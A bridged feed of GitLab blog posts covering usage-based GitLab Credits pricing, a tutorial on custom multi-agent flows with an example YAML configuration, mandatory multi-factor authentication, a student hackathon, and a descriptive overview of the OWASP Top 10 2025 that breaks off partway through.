The most-comprehensive AI-powered DevSecOps platform
gitlab.com.web.brid.gy
The most-comprehensive AI-powered DevSecOps platform
@gitlab.com.web.brid.gy
From planning to production, bring teams together in one application. Ship secure code more efficiently to deliver value faster.

[bridged from https://gitlab.com/ on the web: https://fed.brid.gy/web/gitlab.com ]
Introducing GitLab Credits, usage-based pricing for GitLab Duo Agent Platform
We built GitLab Credits because seat-based pricing for agentic AI was not making sense. Seat-based pricing creates AI “haves" and "have-nots” for engineering teams, a fundamental misalignment with the way that modern agentic AI should be used across the software development lifecycle. Today, you have to buy a seat for every individual before they can start using AI. While this works for the few heavy users, it can be too expensive and unfair for the majority of the team with light or spiky usage. That's why in many organizations, only a portion of the team gets to have an “AI seat." Add to that, GitLab Duo Agent Platform is different from Duo Pro, Duo Enterprise, and other AI developer tools in the market. Agents and agentic workflows can be invoked by your team when they need AI assistance and triggered by SDLC events running in the background. With Duo Agent Platform, agentic AI is no longer only tied to user seats. GitLab Credits addresses these issues as our new virtual currency for usage-based pricing, starting with GitLab Duo Agent Platform. That means, every member in your organization with a GitLab account (Premium or Ultimate) can now use agentic AI capabilities without you paying for an AI seat, whether invoked by them or set up as background agents. ## How GitLab Credits work GitLab Credits are pooled across your entire organization. Your GitLab Duo Agent Platform usage is drawn down from GitLab Credits. That includes both synchronous and asynchronous use of agents and agentic flows. This includes: * Foundational agents such as Security Analyst, Planner, and Data Analyst * Foundational flows such as Code Review, Developer, and Fix CI/CD Pipeline * External agents such as Anthropic Claude Code and OpenAI Codex * Custom agents and flows you build and publish in your GitLab AI Catalog * Agentic Chat in the GitLab UI and in the IDE used by your developers **Note:** External agents are available to try at no cost in 18.8 and do not consume GitLab Credits. We will be introducing pricing next month with our 18.9 release. Custom flows are currently in beta and do not consume GitLab Credits. The amount of credits drawn down is based on the number of agentic requests by large language models (more details here). As more LLMs become available, we will certify them for use with GitLab Duo Agent Platform and add to this list, providing customers with a transparent view of how they are consumed. The total count of GitLab Credits is calculated at the end of the month based on actual usage. This model also automatically offsets usage from power users against that of lighter users, effectively lowering your total cost of AI for every individual (as compared to paying per seat for every individual). For simplicity, each GitLab Credit has an **on-demand** list price of $1. You can use GitLab Duo Agent Platform without any commitments and usage is billed monthly (at the end of each month). For enterprise customers that sign up for **annual commitments** , we offer volume discounts for monthly credits. As a limited-time promotion*, all GitLab customers that have active Premium and Ultimate subscriptions will automatically receive $12 and $24 in **included credits per user** , respectively. These credits will refresh every month until the end of the promotion period and give your team access to all GitLab Duo Agent Platform features at no extra cost. When you accept our billing terms, any usage above these included credits will be billed through committed monthly credits or on-demand credits. ## Cost governance with GitLab Credits **Sizing GitLab Credits:** Your account team has a sizing calculator as part of the GA of GitLab Duo Agent Platform to estimate the number of GitLab Credits you’ll need every month. This calculator was built with usage patterns we’ve observed during the beta period. In addition, as an existing or a new customer, you can request a free trial to confirm your estimated actual usage. **Usage visibility:** With the 18.8 release, you have detailed usage information through two complementary dashboards — one in the GitLab Customers Portal for billing managers focused on financial oversight, and one in-product for administrators focused on operational monitoring. Both provide attribution of usage, cost breakdowns, and historical trends so you always know exactly how your credits are being consumed. If you follow a cross-charging practice internally, you’ll be able to use project- and group-level rollups for cost allocations. **Usage controls:** You can enable or disable GitLab Duo Agent Platform access for specific teams or projects, ensuring only approved usage can tally up to your credits. We also plan to add user-level controls shortly after GA to help you manage who can use GitLab Duo Agent Platform capabilities and draw-down credits. **Automated usage notifications:** We’ll proactively keep you informed about your GitLab Credit usage via email alerts when you reach 50%, 80%, and 100% of your committed monthly credits, giving you time to adjust usage, purchase additional commitments, or plan for on-demand billing. ## Upgrading from seat-based GitLab Duo Pro/Enterprise to GitLab Credits for Duo Agent Platform If you’ve purchased and are using GitLab Duo Pro and Duo Enterprise, you can keep using those capabilities as supported options. You can upgrade to GitLab Duo Agent Platform at any time and do what you can with “classic” Duo and access new capabilities such as agentic chat, additional foundational agents, custom agents and flows, external agents, and more. At the time of upgrade, we will roll forward your investment in seats for GitLab Duo Pro and Duo Enterprise to GitLab Credits for Duo Agent Platform. The remaining dollar amount of seat commitments will be exchanged for monthly GitLab Credits with volume-based discounts. The monthly GitLab Credits can then be shared across every team member in your organization you allow, not just the users who had assigned Duo seats before. ## Competitive comparison: GitLab Credits vs. seat-based pricing Benefit| GitLab Credits| Seat-based pricing ---|---|--- **AI for everyone**| Every approved team member gets AI access from day one| Creates AI "haves" and "have-nots" — forces seat rationing **No upfront Investment**| Start small with included credits, increase commitment as ROI becomes clear| Must purchase seats upfront before proving value **Pay for what you use**| Only the AI work actually performed above included tier is billed| Pay per seat regardless of actual usage **Optimized spend**| Shared credit pool allows you to offset power users with light users| Must pay for light users, overages for premium requests from power users **Detailed visibility**| Usage dashboards with detailed attribution and historical trends| Limited insight into which users drive value **Granular cost controls**| Choose who can access, proactive alerts, and upcoming budget controls to limit| Limit who gets a seat to control costs **Sizing flexibility**| Calculator to estimate monthly credits, with more unit discounts with volume| Count who gets a seat multiplied by price per seat **Simplified contracts and billing**| Single SKU and bill covers all agentic capabilities across the DevSecOps lifecycle| Multiple AI licenses required across different third-party tools ## Getting started 1. **For existing Premium/Ultimate customers** : With GA, GitLab Duo Agent Platform will be available for customers with active Premium and Ultimate licenses**. GitLab.com SaaS customers will gain access automatically. GitLab Self-Managed customers will gain access when they upgrade to the GitLab 18.8 release (with the planned Duo Agent Platform general availability). GitLab Dedicated customers will be upgraded to GitLab 18.8 during their scheduled maintenance window in February and will be able to use Duo Agent Platform from that point. 2. **Enable GitLab Duo** : Ensure GitLab Duo Agent Platform is enabled in your namespace settings. 3. **Start exploring** : Use your included monthly GitLab Credits to try GitLab Duo Agent Platform capabilities. 4. **Go beyond included credits:** You will be able to opt-in to GitLab Credits for expanded usage beyond included credits at the on-demand list price. For volume discounts with commitment, please contact us to get a quote for your specific usage level. Visit our GitLab Duo Agent Platform documentation to learn more about getting started. ## Notes * These included promotional credits are available for a limited time at GA, and subject to change at GitLab’s discretion. ** Excludes GitLab Duo with Amazon Q and GitLab Dedicated for Government customers. > To learn more about GitLab Duo Agent Platform and all the ways agentic AI can transform how your team works, visit our GitLab Duo Agent Platform page. If you are an existing GitLab customer, reach out to your GitLab account manager or partner to schedule a live demonstration of our platform capabilities. ## GitLab Credits FAQ **1. What are GitLab Credits and why did GitLab introduce them?** GitLab Credits is a new virtual currency for usage-based GitLab capabilities, starting with GitLab Duo Agent Platform. GitLab introduced this model because seat-based pricing was forcing organizations to ration AI access within engineering teams, and Duo Agent Platform usage is not just tied to seats. Credits are pooled across your entire organization, allowing you to give every team member access to AI capabilities, or set up background agentic workflows, without requiring individual seat purchases upfront. **2. How does credit consumption work?** Credits are drawn down based on the number of agentic requests made, with different rates depending on which LLM is used. For example, you get two model requests per credit for Claude-sonnet-4.5 (the default for most features), and 20 requests per credit for models like gpt-5-mini or claude-3-haiku. **3. What 's included for existing Premium and Ultimate customers?** As a limited-time promotion, customers with active Premium and Ultimate subscriptions automatically receive included credits free of charge alongside the GA release of Duo Agent Platform in GitLab 18.8: * $12 in credits per user per month for Premium * $24 in credits per user per month for Ultimate Included credits are at a per-user level, refresh monthly, and enable access to all GitLab Duo Agent Platform features at no extra cost. Usage above these included credits will be billed separately. These included promotional credits are available for a limited time after GA, and subject to change at GitLab’s discretion. **4. How can I control and monitor credit usage?** GitLab provides multiple governance tools: detailed usage dashboards in both the Customers Portal and in-product, the ability to enable/disable access for specific teams or projects, upcoming user-level controls, and automated email alerts at 50%, 80%, and 100% of committed monthly credits. We also expect to offer a sizing calculator to estimate your monthly credit needs. **5. How do I get started with GitLab Duo Agent Platform?** Once GA, for existing Premium/Ultimate customers, access is automatic on GitLab.com SaaS. Self-Managed customers gain access when upgrading to GitLab 18.8 with the planned Duo Agent Platform general availability. Simply enable GitLab Duo Agent Platform in your namespace settings and start exploring using your included monthly credits. For usage beyond included credits, you can opt-in to on-demand billing or contact GitLab for volume discounts with annual commitments. _This blog post contains "forward‑looking statements" within the meaning of Section 27A of the Securities Act of 1933, as amended, and Section 21E of the Securities Exchange Act of 1934. Although we believe that the expectations reflected in these statements are reasonable, they are subject to known and unknown risks, uncertainties, assumptions and other factors that may cause actual results or outcomes to differ materially. Further information on these risks and other factors is included under the caption "Risk Factors" in our filings with the SEC. We do not undertake any obligation to update or revise these statements after the date of this blog post, except as required by law._
about.gitlab.com
January 16, 2026 at 6:46 AM
Understanding flows: Multi-agent workflows
_Welcome to Part 4 of our eight-part guide,Getting started with GitLab Duo Agent Platform, where you'll master building and deploying AI agents and workflows within your development lifecycle. Follow tutorials that take you from your first interaction to production-ready automation workflows with full customization._ **In this article:** * What are flows and how do they work? * Foundational flows provided by GitLab * Creating custom flows * Flow execution and orchestration * Real-world examples and use cases > 🎯 Try **GitLab Duo Agent Platform** today! ## Introduction to flows Flows are combinations of one or more agents collaborating together. They orchestrate multi-step workflows to solve complex problems, and are executed on the GitLab platform compute. **Key characteristics of flows:** * **Multi-agent orchestration** : Combine multiple specialized agents * **Built-in** : Run on platform compute, no extra environment necessary * **Event-driven** : Triggered by mention, assignment, or assign as reviewer * **Asynchronous** : Run in background while you continue working * **Complete workflows** : Handle end-to-end tasks from analysis to implementation Think of flows as autonomous workflows that can gather context, make decisions, execute changes, and deliver results, all while you focus on other work. ## Flows vs. agents: Understanding the difference Agents work with you interactively. Flows work for you autonomously. Aspect| Agents| Flows ---|---|--- **Interaction**| Interactive chat| Autonomous execution **When to use**| Questions, guidance, and performing tasks interactively| Autonomous multi-step workflows **User involvement**| Active conversation| Trigger and review results **Execution time**| Real-time responses| Background processing **Complexity**| Single-agent tasks| Multi-agent orchestration ## Flow types overview Type| Interface| Maintainer| Use Case ---|---|---|--- **Foundational**| UI actions, IDE interface| GitLab| Software Development, Developer in issues, Fix CI/CD Pipeline, Convert to GitLab CI/CD, Code Review, SAST false positive detection **Custom**| Mention, assign, assign reviewer| You| Examples: Larger migration/modernization, release automation, dependency update management ## Foundational flows Foundational flows are production-ready workflows created and maintained by GitLab. They're accessible through dedicated UI controls or IDE interfaces. ### Currently available foundational flows Flow| Where Available| How to Access| Best For ---|---|---|--- **Software Development**| IDEs (VS Code, JetBrains, Visual Studio)| Flows tab in IDE| Feature implementation, complex refactoring, multi-file changes **Developer**| GitLab Web UI| "Generate MR with Duo" button on issues| Well-defined features, bug fixes with clear steps **Fix CI/CD Pipeline**| GitLab Web UI| Failed pipeline interface| Pipeline debugging, CI/CD configuration issues **Convert to GitLab CI/CD**| GitLab Web UI| "Convert to GitLab CI/CD" button on Jenkinsfile| Jenkins to GitLab CI/CD migration **Code Review**| GitLab Web UI| Assign as reviewer on MR| Automated code review with AI-native analysis and feedback **SAST false positive detection**| GitLab Web UI| Security scan results| Automatically identify and filter false positives in SAST findings ## Custom flows Custom flows are YAML-defined workflows you create for your team's specific needs. They run in GitLab Runner and can be triggered by GitLab events. > **🎯 Try it now:** Interactive demo of Custom Flows — Explore how to create and configure Custom Flows. ### Why create custom flows? Custom flows automate repetitive multi-step tasks that are specific to your team's workflow. Unlike foundational flows that serve general purposes, custom flows are tailored to your organization's processes, tools, and requirements. **Common use cases:** * **Automated code review** : Multi-stage review process (security scan → quality check → style validation) * **Compliance checking** : Verify regulatory requirements, license compliance, or security policies on each MR * **Documentation generation** : Auto-update API docs, README files, or changelogs based on code changes * **Dependency management** : Weekly security scans, automated updates, and vulnerability reports * **Custom testing** : Specialized test suites for your tech stack or integration tests ### Real-world example A fintech company creates a compliance flow that runs on every merge request. When triggered by `@compliance-flow`, the flow executes the following steps: 1. **Security agent** scans code for PCI-DSS violations and checks for exposed sensitive data. 2. **Code review agent** verifies that changes follow secure coding standards and best practices. 3. **Documentation agent** checks that API changes include updated documentation. 4. **Summary agent** aggregates findings and posts a compliance report with pass/fail status. The entire compliance review happens automatically in 5-10 minutes, providing consistent checks across all merge requests. ### How to trigger custom flows Custom flows can be triggered in multiple ways: **1. Via mentions in Issues/MRs:** Mention the flow in a comment to trigger it. Example for a documentation generation flow: @doc-generator Generate API documentation for this feature **2. By assigning the flow to an issue or MR:** Assign the flow using either: * **GitLab UI** : Click the "Assign" button on the issue/MR and select the flow * **Command** : Use the `/assign` command in a comment. Example: /assign @doc-generator **3. By assigning the flow as a reviewer:** Assign the flow as a reviewer on a merge request using either: * **GitLab UI** : Click the "Assign reviewer" button on the merge request and select the flow * **Command** : Use the `/assign_reviewer` command in a comment. Example: /assign_reviewer @doc-reviewer Any of these methods automatically triggers the flow to execute and perform its tasks. ### How to create custom flows Custom flows are created through the GitLab UI at **Automate → Flows → New flow** in your project, or from **Explore → AI Catalog → Flows → New flow**. You define your flow using YAML configuration that specifies components, prompts, routing, and execution flow. The YAML schema allows you to create sophisticated multi-agent workflows with precise control over agent behavior and orchestration. **Key elements of a custom flow:** * **Components** : Define the agents and steps in your workflow * **Prompts** : Configure AI model behavior and instructions * **Routers** : Control the flow between components * **Toolsets** : Specify which GitLab API tools agents can use ### Example custom flow YAML **Background:** This example shows a feature implementation flow for a travel booking platform. When a developer creates an issue with feature requirements, they can trigger this flow to automatically analyze the requirements, review the codebase, implement the solution, and create a merge request, all without manual intervention. Here's the YAML configuration: version: "v1" environment: ambient components: - name: "implement_feature" type: AgentComponent prompt_id: "implementation_prompt" inputs: - from: "context:goal" as: "user_goal" - from: "context:project_id" as: "project_id" toolset: - "get_issue" - "get_repository_file" - "list_repository_tree" - "find_files" - "blob_search" - "create_file" - "create_commit" - "create_merge_request" - "create_issue_note" ui_log_events: - "on_agent_final_answer" - "on_tool_execution_success" - "on_tool_execution_failed" prompts: - name: "Cheapflights Feature Implementation" prompt_id: "implementation_prompt" unit_primitives: ] prompt_template: system: | You are an expert full-stack developer specializing in travel booking platforms, specifically Cheapflights. Your task is to: 1. Extract the issue IID from the goal (look for "Issue IID: XX") 2. Use get_issue with project_id={{project_id}} and issue_iid to retrieve issue details 3. Analyze the requirements for the flight search feature 4. Review the existing codebase using list_repository_tree, find_files, and get_repository_file 5. Design and implement the solution following Cheapflights best practices 6. Create all necessary code files using create_file (call multiple times for multiple files) 7. Commit the changes using create_commit 8. Create a merge request using create_merge_request 9. Post a summary comment to the issue using create_issue_note with the MR link Cheapflights Domain Expertise: - Flight search and booking systems (Amadeus, Sabre, Skyscanner APIs) - Fare comparison and pricing strategies - Real-time availability and inventory management - Travel industry UX patterns - Performance optimization for high-traffic flight searches Code Standards: - Clean, maintainable code (TypeScript/JavaScript/Python/React) - Proper state management for React components - RESTful API endpoints with comprehensive error handling - Mobile-first responsive design - Proper timezone handling (use moment-timezone or date-fns-tz) - WCAG 2.1 accessibility compliance Flight-Specific Best Practices: - Accurate fare calculations (base fare + taxes + fees + surcharges) - Flight duration calculations across timezones - Search filter logic (price range, number of stops, airlines, departure/arrival times) - Sort algorithms (best value, fastest, cheapest) - Handle edge cases: date line crossing, daylight saving time, red-eye flights - Currency amounts use proper decimal handling (avoid floating point errors) - Dates use ISO 8601 format - Flight codes follow IATA standards (3-letter airport codes) Implementation Requirements: - No TODOs or placeholder comments - All functions must be fully implemented - Include proper TypeScript types or Python type hints - Add JSDoc/docstring comments for all functions - Comprehensive error handling and input validation - Basic unit tests for critical functions - Performance considerations for handling large result sets CRITICAL - Your final comment on the issue MUST include: - **Implementation Summary**: Brief description of what was implemented - **Files Created/Modified**: List of all files with descriptions - **Key Features**: Bullet points of main functionality - **Technical Approach**: Brief explanation of architecture/patterns used - **Testing Notes**: How to test the implementation - **Merge Request Link**: Direct link to the created MR (format: [View Merge Request) IMPORTANT TOOL USAGE: - Extract the issue IID from the goal first (e.g., "Issue IID: 12" means issue_iid=12) - Use get_issue with project_id={{project_id}} and issue_iid=<extracted_iid> - Create multiple files by calling create_file multiple times (once per file) - Use create_commit to commit all files together with a descriptive commit message - Use create_merge_request to create the MR and capture the MR URL from the response - Use create_issue_note with project_id={{project_id}}, noteable_id=<issue_iid>, and body=<your complete summary with MR link> - Make sure to include the MR link in the comment body so users can easily access it user: | Goal: {{user_goal}} Project ID: {{project_id}} Please complete the following steps: 1. Extract the issue IID and retrieve full issue details 2. Analyze the requirements thoroughly 3. Review the existing codebase structure and patterns 4. Implement the feature with production-ready code 5. Create all necessary files (components, APIs, tests, documentation) 6. Commit all changes with a clear commit message 7. Create a merge request 8. Post a detailed summary comment to the issue including the MR link placeholder: history params: timeout: 300 routers: - from: "implement_feature" to: "end" flow: entry_point: "implement_feature" **What this flow does:** This flow orchestrates an AI agent to automatically implement a feature by analyzing issue requirements, reviewing the codebase, writing production-ready code with domain expertise, and creating a merge request with a detailed summary comment. For complete documentation and examples, see: * Custom Flows documentation * Flow Registry Framework (YAML Schema) ## Flow execution Flows run on GitLab platform compute. When triggered by an event (mention, assignment, or button click), a session is created and the flow starts to execute. ### Available environment variables Flows have access to environment variables that provide context about the trigger and the GitLab object: * **`AI_FLOW_CONTEXT`** — JSON-serialized context including MR diffs, issue descriptions, comments, and discussion threads * **`AI_FLOW_INPUT`** — The user's prompt or comment text that triggered the flow * **`AI_FLOW_EVENT`** — The event type that triggered the flow (`mention`, `assign`, `assign_reviewer`) These variables allow your flow to understand what triggered it and access the relevant GitLab data to perform its task. ### Multi-agent flows Custom flows can include multiple agent components that work together sequentially. The flow's YAML configuration defines: * **Components** : One or more agents (AgentComponent) or deterministic steps * **Routers** : Define the flow between components (e.g., from component A to component B to end) * **Prompts** : Configure each agent's behavior and model For example, a code review flow might have a security agent, then a quality agent, then an approval agent, with routers connecting them in sequence. ### Monitoring flow execution To view flows that are running for your project: 1. Navigate to **Automate → Sessions**. 2. Select any session to view more details. 3. The **Details** tab shows a link to the CI/CD job logs. Sessions show detailed information including step-by-step progress, tool invocations, reasoning, and decision-making process. ### When to use flows * Complex multi-step tasks * Background automation * Event-driven workflows * Multi-file changes * Tasks that take time * Automated reviews/checks ## What's next? You now understand flows, how to create them, and when to use them vs. agents. Next, learn how to discover, create, and share agents and flows across your organization in Part 5: AI Catalog. Explore the AI Catalog to browse available flows and agents, add them to your projects, and publish your own agents and flows. ## Resources * GitLab Duo Agent Platform Flows * Foundational Flows documentation * Custom Flows documentation * Flow execution configuration * GitLab CI/CD Variables guide * Service Accounts * * * **Next:** Part 5: AI Catalog **Previous:** Part 3: Understanding agents
about.gitlab.com
January 14, 2026 at 10:46 PM
Strengthening GitLab.com security: Mandatory multi-factor authentication
To strengthen the security of all user accounts on GitLab.com, GitLab is implementing mandatory multi-factor authentication (MFA) for all users and API endpoints who sign in using a username and password. ## Why this is happening This move is a vital part of our Secure by Design commitment. MFA provides critical defense against credential stuffing and account takeover attacks, which remain persistent threats across the software development industry. ## Key information to know ### What is changing? GitLab is making MFA mandatory for sign-ins that authenticate with a username and password. This introduces a critical second layer of security beyond just a password. ### Does this apply to me? 1. _**Yes, it applies if:**_ You sign in to GitLab.com with a username and a password, or use a password to authenticate to the API. 2. _**No, it does not apply if:**_ You exclusively use social sign-on (such as Google) or single sign-on (SSO) for access. (_Please note: If you use SSO, but also have a password for direct login, you will still need MFA for any non-SSO, password-based login.)_ ### When is the rollout? 1. The implementation will be a phased approach over the coming months, intended to both minimize unexpected interruptions and productivity loss for users and prevent account lockouts. Groups of users will be asked to enable MFA over time. Each group will be selected based on the actions they’ve taken or the code they’ve contributed to. You will be notified in the following ways: * ✉️ Email notification - prior to the phase where you will be impacted * 🔔 Regular in-product reminders - 14 days before * ⏱️ After a specific time period (this will be shared via email) - blocked from accessing GitLab until you enable MFA ### What action do I need to take? 1. If you sign in to GitLab.com with a username and a password: * We highly recommend you proactively set up one of the available MFA methods today, such as passkeys, an authenticator app, a WebAuthn device, or email verification. This ensures the most secure and seamless transition: * Go to your GitLab.com **User Settings**. * Select the **Account** section. * Activate **two-factor authentication** and configure your preferred method (e.g., authenticator app or a WebAuthn device). * **Securely save your recovery codes** to guarantee you can regain access if needed. 2. If you use a password to authenticate to the API: * We highly recommend you proactively switch to a personal access token (PAT). Read our documentation to learn more. ## FAQ _What happens if I don 't enable MFA by the deadline?_ * You'll be required to set up MFA before you can sign in. _Does this affect CI/CD pipelines or automation?_ * Yes, unless you're using PATs or deploy tokens instead of passwords. _I use SSO but sometimes sign in directly, do I need MFA?_ * Yes, MFA is required for any password-based authentication, including fallback scenarios. Specific timelines and further resources will be shared as rollout dates approach. Thank you for your attention to this important change.
about.gitlab.com
January 9, 2026 at 10:44 PM
How IIT Bombay students are coding the future with GitLab
The GitLab team recently had the privilege of judging the **iHack Hackathon** at **IIT Bombay 's E-Summit**. The energy was electric, the coffee was flowing, and the talent was undeniable. But what struck us most wasn't just the code — it was the sheer determination of students to solve real-world problems, often overcoming significant logistical and financial hurdles to simply be in the room. Through our GitLab for Education program, we aim to empower the next generation of developers with tools and opportunity. Here is a look at what the students built, and how they used GitLab to bridge the gap between idea and reality. ## The challenge: Build faster, build securely The premise for the GitLab track of the hackathon was simple: Don't just show us a product; show us how you built it. We wanted to see how students utilized GitLab's platform — from Issue Boards to CI/CD pipelines — to accelerate the development lifecycle. The results were inspiring. ## The winners ### 1st place: Team Decode — Democratizing Scientific Research **Project:** FIRE (Fast Integrated Research Environment) Team Decode took home the top prize with a solution that warms a developer's heart: a local-first, blazing-fast data processing tool built with Rust and Tauri. They identified a massive pain point for data science students: existing tools are fragmented, slow, and expensive. Their solution, FIRE, allows researchers to visualize complex formats (like NetCDF) instantly. What impressed the judges most was their "hacker" ethos. They didn't just build a tool; they built it to be open and accessible. **How they used GitLab:** Since the team lived far apart, asynchronous communication was key. They utilized **GitLab Issue Boards** and **Milestones** to track progress and integrated their repo with Telegram to get real-time push notifications. As one team member noted, "Coordinating all these technologies was really difficult, and what helped us was GitLab... the Issue Board really helped us track who was doing what." ### 2nd place: Team BichdeHueDost — Reuniting to Solve Payments **Project:** SemiPay (RFID Cashless Payment for Schools) The team name, BichdeHueDost, translates to "Friends who have been set apart." It's a fitting name for a group of friends who went to different colleges but reunited to build this project. They tackled a unique problem: handling cash in schools for young children. Their solution used RFID cards backed by a blockchain ledger to ensure secure, cashless transactions for students. **How they used GitLab:** They utilized GitLab CI/CD to automate the build process for their Flutter application (APK), ensuring that every commit resulted in a testable artifact. This allowed them to iterate quickly despite the "flaky" nature of cross-platform mobile development. ### 3rd place: Team ZenYukti — The Eyes of the Campus **Project:** KSHR (Unified Intelligence Platform) Team ZenYukti impressed us with a heavy-duty enterprise architecture. They built a comprehensive campus monitoring system designed to detect anomalies and ensure student safety using CCTV and biometric data. **How they used GitLab:** This team showed a sophisticated understanding of DevOps. They used **GitLab CI** with conditional logic—triggering specific pipelines only when front-end or back-end folders changed. They also utilized private container registries to manage their Docker images securely. ## Beyond the code: A lesson in inclusion While the code was impressive, the most powerful moment of the event happened away from the keyboard. During the feedback session, we learned about the journey Team ZenYukti took to get to Mumbai. They traveled over 24 hours, covering nearly 1,800 kilometers. Because flights were too expensive and trains were booked, they traveled in the "General Coach" — a non-reserved, severely overcrowded carriage. As one student described it: _" You cannot even imagine something like this... there are no seats... people sit on the top of the train. This is what we have endured."_ This hit home. Diversity, Inclusion, and Belonging are core values at GitLab. We realized that for these students, the barrier to entry wasn't intellect or skill - it was access. In that moment, we decided to break that barrier. We committed to reimbursing the travel expenses for the participants who struggled to get there. It's a small step, but it underlines a massive truth: **talent is distributed equally, but opportunity is not.** ### The future is bright (and automated) We also saw incredible potential in teams like Prometheus, who attempted to build an autonomous patch remediation tool (DevGuardian), and Team Arrakis, who built a voice-first job portal for blue-collar workers using GitLab Duo to troubleshoot their pipelines. To all the students who participated: You are the future. Through GitLab for Education, we are committed to providing you with the top-tier tools (like GitLab Ultimate) you need to learn, collaborate, and change the world — whether you are coding from a dorm room, a lab, or a train carriage. **Keep shipping.** > 💡 Learn more about the GitLab for Education program.
about.gitlab.com
January 8, 2026 at 10:44 PM
OWASP Top 10 2025: What's changed and why it matters
The OWASP Foundation has released the eighth edition of its influential "Top 10 Security Risks" list for 2025, introducing significant changes that reflect the evolving landscape of application security. Based on analysis of more than 175,000 Common Vulnerabilities and Exposures (CVEs) records and feedback from security practitioners across the globe, this update addresses modern attack vectors. Here's everything you need to know about what's changed, why these changes matter, and how to protect your systems. > 💡 Join GitLab Transcend on February 10 to learn how agentic AI transforms software delivery. Hear from customers and discover how to jumpstart your own modernization journey. Register now. ## What's new in 2025? The shift from 2021 (the last time the list came out) to 2025 represents more than minor adjustments, it's a fundamental shift in application security. Two entirely new categories entered the list and one category was consolidated into another, which highlights emerging risks that traditional testing often misses. These additions and shifts can be seen in the chart below: ### Two new categories * **A03: Software Supply Chain Failures** : Expands the 2021 category "Vulnerable and Outdated Components" to encompass the entire software supply chain, including dependencies, build systems, and distribution infrastructure. Despite having the fewest occurrences in testing data, this category has the highest average exploit and impact scores from CVEs. * **A10: Mishandling of Exceptional Conditions** : Focuses on improper error handling, logical errors, and failing open scenarios. This addresses how systems respond to abnormal conditions. ### Major ranking changes * Security Misconfiguration surged from #5 (2021) to #2 (2025), now affecting 3% of tested applications. * Server-Side Request Forgery (SSRF) has been consolidated into A01: Broken Access Control. * Cryptographic Failures dropped from #2 to #4. * Injection fell from #3 to #5. * Insecure Design moved from #4 to #6. ## Why these changes were made The OWASP methodology combines data-driven analysis with community insights. The 2025 edition analyzed 589 Common Weakness Enumerations (CWEs), which is a substantial increase from the approximately 400 CWEs in 2021. This expansion reflects the growing complexity of modern software systems and the need to capture emerging threats. The community survey component addresses a fundamental limitation: testing data essentially looks into the past. By the time security researchers develop testing methodologies and integrate them into automated tools, years may have passed. The two community-voted categories ensure that emerging risks identified by frontline practitioners are included, even if they're not yet prevalent in automated testing data. The rise of Security Misconfiguration highlights an industry trend toward configuration-based security, while Software Supply Chain Failures acknowledges the rise of sophisticated attacks targeting compromised packages. ## Using GitLab Ultimate for vulnerability detection and management GitLab Ultimate provides comprehensive security scanning to detect risks across the 2025 OWASP Top 10 categories. For instance, the end-to-end platform analyzes your project's source code, dependencies, and infrastructure definitions. It also uses Advanced Static Application Security Testing (SAST) to detect injection flaws, cryptographic failures, and insecure design patterns in source code. Infrastructure as Code (IaC) scanning finds security misconfigurations in your deployment definitions. Secret Detection prevents the leakage of credentials, and Dependency Scanning uncovers libraries with known vulnerabilities in your software supply chain, which directly addresses the new A03 category for Software Supply Chain Failures. In addition: * Dynamic Application Security Testing (DAST) probes your deployed application for broken access control, authentication failures, and injection vulnerabilities by simulating attack vectors. * API Security Testing probes your API endpoints for input validation weaknesses and authentication bypasses. * Web API Fuzz Testing uncovers how your application handles exceptional conditions by generating unexpected inputs, which directly addresses the new A10 category for mishandling of exceptional conditions. Security scanning integrates seamlessly into your CI/CD pipeline, running when code is pushed from a feature branch so developers can remediate vulnerabilities before they reach production. Security findings are consolidated in the Vulnerability Report, where security teams can triage, analyze, and track remediation. GitLab also allows you to leverage AI agents such as Security Analyst Agent, available in GitLab Duo Agent Platform, to quickly determine what are the most critical vulnerabilities and how to take action on them. You can enforce additional controls through merge request approval policies and pipeline execution policies to ensure security scanning runs consistently across your organization. Customer Success and Professional Services teams at GitLab ensure you derive value from an investment in GitLab in a timely manner. Deliver secure software faster with security testing in the same platform developers already use. To learn more, visit our application security testing solutions site. ## The OWASP Top 10 2025: Complete breakdown ### A01: Broken Access Control ##### What it is Failures in enforcing policies that prevent users from acting outside their intended permissions, leading to unauthorized access. ##### Impact on your system * Unauthorized information disclosure * Complete data destruction or data modification * Privilege escalation (users gaining admin rights) * Viewing or editing other users' accounts * API access from unauthorized or untrusted sources ##### Notable CWEs * CWE-22: Path Traversal * CWE-200: Exposure of Sensitive Information to an Unauthorized Actor * CWE-352: Cross-Site Request Forgery (CSRF) ### A02: Security Misconfiguration ##### What it is Systems, applications, or cloud services configured incorrectly from a security perspective. ##### Impact on your system * Exposure of sensitive information through error messages * Unauthorized access through default accounts * Unnecessary services or features enabled * Outdated security patches * Server does not send security headers or directives ##### Notable CWEs * CWE-16: Configuration * CWE-521: Weak Password Requirements * CWE-798: Use of Hard-coded Credentials ### A03: Software Supply Chain Failures ##### What it is Breakdowns or compromises in building, distributing, or updating software through vulnerabilities or malicious changes in dependencies, tools, or build processes. ##### Impact on your system: * Compromised packages introducing backdoors * Malicious code injected during build processes * Vulnerable dependencies cascading through your application * Use of components from untrusted sources in production * Changes within your supply chain are not tracked ##### Notable CWEs * CWE-1395: Dependency on Vulnerable Third-Party Component * CWE-1104: Use of Unmaintained Third Party Components ### A04: Cryptographic Failures ##### What it is Failures related to lack of cryptography, insufficiently strong cryptography, leaking of cryptographic keys, and related errors. ##### Impact on your system: * Sensitive data exposure (passwords, credit cards, health records) * Man-in-the-middle attacks * Data breach through weak encryption * Key compromise leading to system-wide exposure * Regulatory compliance failures (GDPR, PCI DSS) ##### Notable CWEs * CWE-327: Use of a Broken or Risky Cryptographic Algorithm * CWE-330: Use of Insufficiently Random Values ### A05: Injection ##### What it is System flaws allowing attackers to insert malicious code or commands (SQL, NoSQL, OS commands, LDAP, etc.) into programs. ##### Impact on your system * Data loss or corruption through SQL injection * Complete database compromise * Server takeover through command injection * Cross-site scripting (XSS) attacks * Information disclosure * Denial of service ##### Notable CWEs * CWE-89: SQL Injection * CWE-78: OS Command Injection ### A06: Insecure Design ##### What it is Weaknesses in design representing different failures, expressed as missing or ineffective control design—architectural flaws rather than implementation bugs. ##### Impact on your system * Weak password reset flows * Missing authorization steps * Flawed business logic allowing bypasses * Inadequate threat modeling leading to blind spots * Design patterns that fail under attack scenarios ##### Notable CWEs * CWE-209: Generation of Error Messages Containing Sensitive Information * CWE-522: Insufficiently Protected Credentials * CWE-656: Reliance on Security Through Obscurity ### A07: Authentication Failures ##### What it is Vulnerabilities allowing attackers to trick systems into recognizing invalid or incorrect users as legitimate. ##### Impact on your system * Account takeover and credential stuffing * Session hijacking * Brute force attacks succeeding * Weak password 